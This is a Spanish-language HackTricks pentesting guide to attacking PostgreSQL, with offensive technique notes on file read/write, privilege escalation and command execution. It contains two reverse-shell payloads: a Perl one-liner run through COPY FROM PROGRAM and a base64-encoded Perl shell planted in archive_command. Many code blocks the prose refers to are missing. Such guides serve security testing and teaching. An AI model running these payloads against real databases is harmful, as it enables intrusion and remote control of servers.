Utiliza [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir y **automatizar flujos de trabajo** fácilmente con las herramientas comunitarias **más avanzadas** del mundo.\
<summary><strong>Aprende hacking de AWS desde cero hasta héroe con</strong><ahref="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Si quieres ver a tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** revisa los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sigue** a **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Comparte tus trucos de hacking enviando PRs a los repositorios de GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
**Puerto predeterminado:** 5432, y si este puerto ya está en uso parece que postgresql utilizará el siguiente puerto (probablemente 5433) que no esté en uso.
De acuerdo con [**esta investigación**](https://www.exploit-db.com/papers/13084), cuando un intento de conexión falla, `dblink` lanza una excepción `sqlclient_unable_to_establish_sqlconnection` que incluye una explicación del error. A continuación, se enumeran ejemplos de estos detalles.
`DETAIL: no se pudo conectar al servidor: No hay ruta al host ¿Está el servidor ejecutándose en el host "1.2.3.4" y aceptando conexiones TCP/IP en el puerto 5678?`
| rolcanlogin | El rol puede iniciar sesión. Es decir, este rol se puede dar como el identificador de autorización de sesión inicial |
| rolreplication | El rol es un rol de replicación. Un rol de replicación puede iniciar conexiones de replicación y crear y eliminar slots de replicación. |
| rolconnlimit | Para roles que pueden iniciar sesión, esto establece el número máximo de conexiones concurrentes que este rol puede realizar. -1 significa sin límite.|
| rolpassword | No es la contraseña (siempre se muestra como `********`) |
| rolvaliduntil | Tiempo de expiración de la contraseña (solo se utiliza para la autenticación por contraseña); nulo si no hay expiración |
| rolbypassrls | El rol omite todas las políticas de seguridad a nivel de fila, ver [Sección 5.8](https://www.postgresql.org/docs/current/ddl-rowsecurity.html) para más información. |
| rolconfig | Valores predeterminados específicos del rol para variables de configuración en tiempo de ejecución |
Desde este [**commit**](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a) los miembros del grupo definido **`DEFAULT_ROLE_READ_SERVER_FILES`** (llamado **`pg_read_server_files`**) y los **super usuarios** pueden usar el método **`COPY`** en cualquier ruta (revisa `convert_and_check_filename` en `genfile.c`):
Existen **otras funciones de postgres** que se pueden utilizar para **leer un archivo o listar un directorio**. Solo los **superusuarios** y **usuarios con permisos explícitos** pueden usarlas:
Recuerda que COPY no puede manejar caracteres de nueva línea, por lo tanto, incluso si estás utilizando una carga útil en base64, **necesitas enviar una línea única**.\
Una limitación muy importante de esta técnica es que **`copy` no se puede usar para escribir archivos binarios ya que modifica algunos valores binarios.**
**Consejo para bug bounty**: **regístrate** en **Intigriti**, una plataforma de bug bounty premium creada por hackers, para hackers. Únete a nosotros en [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) hoy mismo, y comienza a ganar recompensas de hasta **$100,000**.
Desde la [versión 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html), solo los **super usuarios** y miembros del grupo **`pg_execute_server_program`** pueden usar copy para RCE (ejemplo con exfiltración:
#Notice that in order to scape a single quote you need to put 2 single quotes
COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;''';
Más información sobre esta vulnerabilidad [**aquí**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5). Aunque se informó como CVE-2019-9193, Postgres declaró que esto era una [característica y no se corregirá](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/).
Una vez que hayas **aprendido** del post anterior **cómo subir archivos binarios**, podrías intentar obtener **RCE subiendo una extensión de postgresql y cargándola**.
El **archivo de configuración** de postgresql es **editable** por el usuario **postgres**, que es quien ejecuta la base de datos, por lo que como **superusuario** puedes escribir archivos en el sistema de archivos, y por lo tanto, puedes **sobrescribir este archivo**.
*`ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'` Ruta a la clave privada de la base de datos
*`ssl_passphrase_command = ''` Si el archivo privado está protegido por contraseña (cifrado), postgresql **ejecutará el comando indicado en este atributo**.
*`ssl_passphrase_command_supports_reload = off`**Si** este atributo está **activado**, el **comando** ejecutado si la clave está protegida por contraseña **se ejecutará** cuando `pg_reload_conf()` sea **ejecutado**.
Al probar esto, noté que esto solo funcionará si el **archivo de clave privada tiene privilegios 640**, es **propiedad de root** y del **grupo ssl-cert o postgres** (para que el usuario postgres pueda leerlo), y está ubicado en _/var/lib/postgresql/12/main_.
Para que esto funcione, la configuración `archive_mode` tiene que estar en `'on'` o `'always'`. Si eso es cierto, entonces podríamos sobrescribir el comando en `archive_command` y forzar su ejecución a través de las operaciones de WAL (registro de escritura anticipada).
2. Sobrescribir `archive_command` con el payload. Por ejemplo, un shell inverso: `archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'`
4. Forzar la operación WAL para ejecutar, lo que llamará al comando de archivo: `SELECT pg_switch_wal()` o `SELECT pg_switch_xlog()` para algunas versiones de Postgres
**Más** [**información sobre esta configuración y sobre WAL aquí**](https://medium.com/dont-code-me-on-that/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3)**.**
Según la [**documentación**](https://www.postgresql.org/docs/13/sql-grant.html): _Los roles con el privilegio **`CREATEROLE`** pueden **otorgar o revocar la membresía en cualquier rol** que **no** sea **superusuario**._
Por lo tanto, si tienes el permiso **`CREATEROLE`**, podrías otorgarte acceso a otros **roles** (que no sean superusuario) que te den la opción de leer y escribir archivos y ejecutar comandos:
Es bastante común encontrar que **los usuarios locales pueden iniciar sesión en PostgreSQL sin proporcionar ninguna contraseña**. Por lo tanto, una vez que hayas obtenido **permisos para ejecutar código**, puedes abusar de estos permisos para otorgarte el rol de **`SUPERUSER`**:
En [este **artículo**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities) se explica cómo fue posible realizar un **privesc** en Postgres GCP abusando del privilegio ALTER TABLE que se le había otorgado al usuario.
Cuando intentas **hacer a otro usuario propietario de una tabla**, deberías recibir un **error** que lo impida, pero aparentemente GCP otorgó esa **opción al usuario postgres no-superusuario** en GCP:
Combinando esta idea con el hecho de que cuando se ejecutan los comandos **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html) en una **tabla con una función de índice**, la **función** se **llama** como parte del comando con los **permisos del propietario de la tabla**. Es posible crear un índice con una función y dar permisos de propietario a un **superusuario** sobre esa tabla, y luego ejecutar ANALYZE sobre la tabla con la función maliciosa que podrá ejecutar comandos porque está utilizando los privilegios del propietario.
2. Insertar contenido ficticio en la tabla, para que la función de índice tenga algo con lo que trabajar.
3. Crear una función de índice maliciosa (con nuestro payload de ejecución de código) en la tabla.
4. ALTER el propietario de la tabla a cloudsqladmin, el rol de superusuario de GCP, utilizado solo por Cloud SQL para mantener y gestionar la base de datos.
5. ANALIZAR la tabla, forzando al motor de PostgreSQL a cambiar el contexto de usuario al propietario de la tabla (cloudsqladmin) y llamar a la función de índice maliciosa con los permisos de cloudsqladmin, resultando en la ejecución de nuestro comando shell, el cual no teníamos permiso para ejecutar antes.
Algunas instancias de postgresql mal configuradas podrían permitir el inicio de sesión de cualquier usuario local, es posible iniciar sesión localmente desde 127.0.0.1 utilizando la **función `dblink`**:
Si tienes la contraseña de un usuario con más privilegios, pero al usuario no se le permite iniciar sesión desde una IP externa, puedes usar la siguiente función para ejecutar consultas como ese usuario:
\*\*\*\*[**En este informe**](https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql), pentesters lograron privesc dentro de una instancia de postgres proporcionada por IBM, porque **encontraron esta función con la bandera SECURITY DEFINER**:
Como [**se explica en la documentación**](https://www.postgresql.org/docs/current/sql-createfunction.html), una función con **SECURITY DEFINER se ejecuta** con los privilegios del **usuario que la posee**. Por lo tanto, si la función es **vulnerable a inyección SQL** o realiza algunas **acciones privilegiadas con parámetros controlados por el atacante**, podría ser abusada para **escalar privilegios dentro de postgres**.
PL/pgSQL, como un **lenguaje de programación completamente equipado**, permite mucho más control procedimental que SQL, incluyendo la **capacidad de usar bucles y otras estructuras de control**. Las declaraciones SQL y los disparadores pueden llamar a funciones creadas en el lenguaje PL/pgSQL.\
**Puedes abusar de este lenguaje para pedirle a PostgreSQL que realice fuerza bruta en las credenciales de los usuarios.**
Puedes encontrar **contraseñas** dentro del archivo _**pgadmin4.db**_\
Puedes desencriptarlas utilizando la función _**decrypt**_ dentro del script: [https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py](https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py)
La autenticación de clientes está controlada por un archivo de configuración que frecuentemente se llama _**pg\_hba.conf**_. Este archivo tiene un conjunto de registros. Un registro puede tener uno de los siguientes siete formatos:
**Cada** registro **especifica** un **tipo de conexión**, un **rango de direcciones IP del cliente** (si es relevante para el tipo de conexión), un **nombre de base de datos**, un **nombre de usuario** y el **método de autenticación** que se usará para las conexiones que coincidan con estos parámetros. El **primer registro que coincida** con el tipo de conexión, dirección del cliente, base de datos solicitada y nombre de usuario **se utiliza** para realizar la autenticación. No hay "continuación" o "respaldo": **si se elige un registro y la autenticación falla, los registros subsiguientes no se consideran**. Si ningún registro coincide, se deniega el acceso.\
Los métodos de autenticación **basados en contraseña** son **md5**, **crypt** y **password**. Estos métodos operan de manera similar excepto por la forma en que la contraseña se envía a través de la conexión: respectivamente, en hash MD5, encriptada con crypt y en texto claro. Una limitación es que el método crypt no funciona con contraseñas que han sido encriptadas en pg\_authid.
<summary><strong>Aprende hacking en AWS de cero a héroe con</strong><ahref="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Si quieres ver a tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de Telegram**](https://t.me/peass) o **sigue** a **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Comparte tus trucos de hacking enviando PRs a los repositorios de GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
Usa [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir y **automatizar flujos de trabajo** fácilmente, potenciados por las herramientas comunitarias **más avanzadas**.\
